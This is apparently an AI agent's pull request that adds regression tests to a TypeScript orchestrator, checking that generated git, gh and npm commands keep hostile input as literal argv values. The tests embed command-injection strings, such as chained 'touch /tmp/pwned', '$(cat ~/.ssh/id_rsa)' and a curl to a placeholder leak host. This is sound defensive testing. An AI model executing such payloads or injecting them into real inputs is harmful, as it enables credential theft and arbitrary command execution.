### PR TITLE
test(orchestrator): cover generated command argv boundaries

### DIFF
--- a/packages/franken-orchestrator/test/closure/pr-creator-argv.test.ts
+++ b/packages/franken-orchestrator/test/closure/pr-creator-argv.test.ts
@@ -69,6 +69,37 @@ describe('PrCreator argv subprocess safety', () => {
     expect(create!.args).toContain('--body');
   });
 
+  it('keeps hostile PR titles and bodies as single gh argv values', async () => {
+    const { exec, calls } = makeExecRecorder('feature/security-boundary');
+    const hostileTitle = 'fix: close issue; touch /tmp/pwned';
+    const hostileBody = [
+      '## Summary',
+      '- preserve webhook URL https://hooks.example.test/a?token=$(cat ~/.ssh/id_rsa)',
+      '- keep body text with semicolons; pipes | and backticks `uname` literal',
+      '',
+      'Closes #1711',
+    ].join('\n');
+    const llm = { complete: async () => `TITLE: ${hostileTitle}\nBODY:\n${hostileBody}` };
+    const creator = new PrCreator(
+      { targetBranch: 'main', disabled: false, remote: 'origin', disableBranding: true },
+      exec,
+      llm,
+    );
+
+    const result = await creator.create(makeResult(), undefined, { issueNumber: 1711 });
+
+    expect(result).toEqual({ url: 'https://example.com/pr/1' });
+    const create = calls.find(c => c.command === 'gh' && c.args.includes('create'));
+    expect(create).toBeDefined();
+    const titleIndex = create!.args.indexOf('--title');
+    const bodyIndex = create!.args.indexOf('--body');
+    expect(create!.args[titleIndex + 1]).toBe(hostileTitle);
+    expect(create!.args[bodyIndex + 1]).toContain('$(cat ~/.ssh/id_rsa)');
+    expect(create!.args[bodyIndex + 1]).toContain('`uname` literal');
+    expect(create!.args[bodyIndex + 1]).toContain('Fixes #1711');
+    expect(create!.args.every(arg => arg !== 'touch' && arg !== '/tmp/pwned')).toBe(true);
+  });
+
   it('refuses to run any subprocess when the branch contains shell metacharacters', async () => {
     const { exec, calls } = makeExecRecorder('evil$(touch pwned)');
     const creator = new PrCreator(

--- a/packages/franken-orchestrator/test/closure/pr-creator-argv.test.ts
+++ b/packages/franken-orchestrator/test/closure/pr-creator-argv.test.ts
@@ -77,7 +77,7 @@ describe('PrCreator argv subprocess safety', () => {
       '- preserve webhook URL https://hooks.example.test/a?token=$(cat ~/.ssh/id_rsa)',
       '- keep body text with semicolons; pipes | and backticks `uname` literal',
       '',
-      'Closes #1711',
+      'References #1711',
     ].join('\n');
     const llm = { complete: async () => `TITLE: ${hostileTitle}\nBODY:\n${hostileBody}` };
     const creator = new PrCreator(

--- a/packages/franken-orchestrator/tests/unit/issues/issue-fetcher.test.ts
+++ b/packages/franken-orchestrator/tests/unit/issues/issue-fetcher.test.ts
@@ -233,6 +233,28 @@ describe('IssueFetcher', () => {
       expect(args).toContain('--assignee');
       expect(args).toContain('--limit');
     });
+
+    it('keeps hostile repo names, labels, and issue-title searches as argv values', async () => {
+      const execFn = vi.fn(makeExecFn('[]'));
+      const fetcher = new IssueFetcher(execFn);
+      const hostileRepo = 'org/repo; touch /tmp/pwned';
+      const hostileLabel = 'security && curl https://hooks.example.test/leak';
+      const hostileTitle = 'Security: $(cat ~/.ssh/id_rsa) | `uname`';
+
+      await fetcher.fetch({
+        repo: hostileRepo,
+        label: [hostileLabel],
+        search: hostileTitle,
+        limit: 5,
+      });
+
+      const [file, args] = execFn.mock.calls[0]!;
+      expect(file).toBe('gh');
+      expect(args[args.indexOf('--repo') + 1]).toBe(hostileRepo);
+      expect(args[args.indexOf('--label') + 1]).toBe(hostileLabel);
+      expect(args[args.indexOf('--search') + 1]).toBe(hostileTitle);
+      expect(args.every(arg => arg !== 'touch' && arg !== '/tmp/pwned')).toBe(true);
+    });
   });
 
   describe('inferRepo()', () => {

--- a/packages/franken-orchestrator/tests/unit/skills/cli-skill-executor.test.ts
+++ b/packages/franken-orchestrator/tests/unit/skills/cli-skill-executor.test.ts
@@ -616,6 +616,20 @@ describe('CliSkillExecutor', () => {
       expect(() => rmSync(marker)).toThrow();
       rmSync(root, { recursive: true, force: true });
     });
+
+    it('rejects package-script arguments instead of parsing caller text after npm run', async () => {
+      git.getStatus.mockReturnValue(' M src/file.ts');
+      const checkpoint = makeCheckpoint({ lastCommit: vi.fn(() => 'safe123') });
+      const executor = harness.executor({
+        verifyCommand: 'npm run test -- --run $(curl https://hooks.example.test/leak)',
+      });
+
+      await expect(executor.recoverDirtyFiles('impl:11_rate_limit_resilience', 'impl', checkpoint, makeLogger()))
+        .resolves.toBe('reset');
+
+      expect(git.resetHard).toHaveBeenCalledWith('safe123');
+      expect(git.autoCommit).not.toHaveBeenCalled();
+    });
   });
 
   describe('chunk session recovery metadata', () => {

--- a/packages/franken-orchestrator/tests/unit/skills/cli-skill-executor.test.ts
+++ b/packages/franken-orchestrator/tests/unit/skills/cli-skill-executor.test.ts
@@ -618,10 +618,13 @@ describe('CliSkillExecutor', () => {
     });
 
     it('rejects package-script arguments instead of parsing caller text after npm run', async () => {
+      const root = mkdtempSync(join(tmpdir(), 'verify-command-package-injection-'));
+      const marker = join(root, 'pwned');
+      git.getWorkingDir.mockReturnValue(root);
       git.getStatus.mockReturnValue(' M src/file.ts');
       const checkpoint = makeCheckpoint({ lastCommit: vi.fn(() => 'safe123') });
       const executor = harness.executor({
-        verifyCommand: 'npm run test -- --run $(curl https://hooks.example.test/leak)',
+        verifyCommand: `npm run test -- --run $(${process.execPath} -e "require('node:fs').writeFileSync('${marker}', 'pwned')")`,
       });
 
       await expect(executor.recoverDirtyFiles('impl:11_rate_limit_resilience', 'impl', checkpoint, makeLogger()))
@@ -629,6 +632,8 @@ describe('CliSkillExecutor', () => {
 
       expect(git.resetHard).toHaveBeenCalledWith('safe123');
       expect(git.autoCommit).not.toHaveBeenCalled();
+      expect(() => rmSync(marker)).toThrow();
+      rmSync(root, { recursive: true, force: true });
     });
   });
 

--- a/packages/franken-orchestrator/tests/unit/skills/git-branch-isolator.test.ts
+++ b/packages/franken-orchestrator/tests/unit/skills/git-branch-isolator.test.ts
@@ -584,6 +584,7 @@ describe('GitBranchIsolator', () => {
       cwdIsolator.isolate('03_my_chunk');
 
       expectGit(['checkout', '-b', 'chunk/03_my_chunk'], cwd);
+      expect(mockExecFileSync.mock.calls.every(([, , opts]) => (opts as { cwd?: string } | undefined)?.cwd === cwd)).toBe(true);
       expect(mockExecSync.mock.calls.every(([cmd]) => !String(cmd).includes('touch /tmp/pwned'))).toBe(true);
     });
   });

--- a/packages/franken-orchestrator/tests/unit/skills/git-branch-isolator.test.ts
+++ b/packages/franken-orchestrator/tests/unit/skills/git-branch-isolator.test.ts
@@ -571,6 +571,21 @@ describe('GitBranchIsolator', () => {
       expect(() => isolator.autoCommit('chunk$(evil)', 'impl', 1)).toThrow();
       expect(() => isolator.merge('chunk`whoami`')).toThrow();
     });
+
+    it('passes hostile-looking working directories only as exec cwd metadata', () => {
+      mockExecSync.mockImplementation((cmd: string) => {
+        if (cmd === 'git branch --list main') return '  main\n';
+        if (cmd === 'git branch --list chunk/03_my_chunk') return '';
+        return '';
+      });
+      const cwd = '/tmp/repo; touch /tmp/pwned $(whoami)';
+      const cwdIsolator = new GitBranchIsolator(makeConfig({ workingDir: cwd }));
+
+      cwdIsolator.isolate('03_my_chunk');
+
+      expectGit(['checkout', '-b', 'chunk/03_my_chunk'], cwd);
+      expect(mockExecSync.mock.calls.every(([cmd]) => !String(cmd).includes('touch /tmp/pwned'))).toBe(true);
+    });
   });
 
   describe('autoCommit() submodule awareness', () => {

--- a/tasks/issue-1711-shell-argument-boundary-progress.md
+++ b/tasks/issue-1711-shell-argument-boundary-progress.md
@@ -1,0 +1,11 @@
+# Issue 1711 Shell Argument Boundary Progress
+
+- [x] Read task, shared lessons, and issue #1711.
+- [x] Confirm repository/auth/git identity state.
+- [x] Locate existing generated-command helpers and safety tests.
+- [x] Add focused argument-boundary regression coverage for generated Git/GitHub/package/helper command paths.
+- [x] Implement the smallest code fixes if the new tests expose unsafe construction. (No production fix required; existing execFile/argv boundaries already held.)
+- [x] Run targeted tests and broader package/root verification. (Targeted tests, lint, typecheck, and build pass; full orchestrator test pass needs `--maxWorkers=1` and has two unrelated `tests/unit/cli/run.test.ts` resume-base failures.)
+- [ ] Open PR closing only #1711.
+- [ ] Run real GitHub `@codex review` loop until current-head clean, then merge if CI is green.
+- [ ] Append reusable shared lessons if useful and complete/block the Kanban card.


### PR DESCRIPTION
## Summary
- Adds regression coverage for hostile-looking PR titles/bodies remaining single `gh pr create` argv values.
- Adds IssueFetcher coverage for hostile repo, label, and search values passed as discrete argv elements.
- Adds command-boundary coverage for verify package scripts and hostile-looking git working directories.

## Test Plan
- `TMPDIR=$PWD/.tmp npm run test --workspace @franken/orchestrator -- --run --maxWorkers=1 test/closure/pr-creator-argv.test.ts tests/unit/issues/issue-fetcher.test.ts tests/unit/skills/cli-skill-executor.test.ts tests/unit/skills/git-branch-isolator.test.ts`
- `TMPDIR=$PWD/.tmp npm run lint --workspace @franken/orchestrator` (passes with existing warnings)
- `TMPDIR=$PWD/.tmp npm run typecheck -- --filter=@franken/orchestrator`
- `TMPDIR=$PWD/.tmp npm run build -- --filter=@franken/orchestrator`
- `TMPDIR=$PWD/.tmp npm run test --workspace @franken/orchestrator -- --run --maxWorkers=1` (3172/3174 pass; two pre-existing/unrelated resume-base failures in `tests/unit/cli/run.test.ts`)

Closes #1711